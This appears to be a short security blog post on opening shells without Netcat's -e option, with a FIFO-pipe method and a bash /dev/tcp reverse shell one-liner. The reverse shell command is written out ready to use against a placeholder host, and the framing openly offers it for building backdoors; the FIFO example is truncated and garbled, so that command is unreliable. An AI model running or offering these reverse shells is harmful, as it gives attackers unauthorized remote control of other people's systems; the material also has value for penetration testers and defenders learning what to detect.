Netcat backdoor without -e and mimicking Netcat with bash

Netcat backdoor without -e (execute option)

Netcat is installed by default on a lot of Linux systems, however we are seeing more and more Netcat’s are compiled without the -e option. The -e options allows us to execute and serve an executable over the connecting socket. It is incredibly handy feature, both for controlling an executable over a network connection, or for creating simple backdoors. Thus as a security measure, Netcat is sometimes compiled without the -e option. In fact, if you want to compile Netcat with the -e option, you need to compile it with the option GAPING_SECURITY_HOLE. 

While the -e option can be a concern from a security point of view, it is  often trivially bypassed.

Below are examples that servers shells without the execute option. In the examples, a special Linux pipe type of file is used. This is a FIFO type of file structure, what goes first in, goes first out. Quite handy for pushing data in orderly fashion.

mknod p pipe
/bin/bash 0

I don’t care what you just showed me, I dont have Netcat!

Bash can do arbitrary TCP and UDP connections to wherever you want, so a Netcat similar reverse shell would be:

/bin/bash -i >& /dev/tcp/TargetIP/Port 0>&1

On your target system you should be receiving a sweet bash shell.





Looking to get in touch?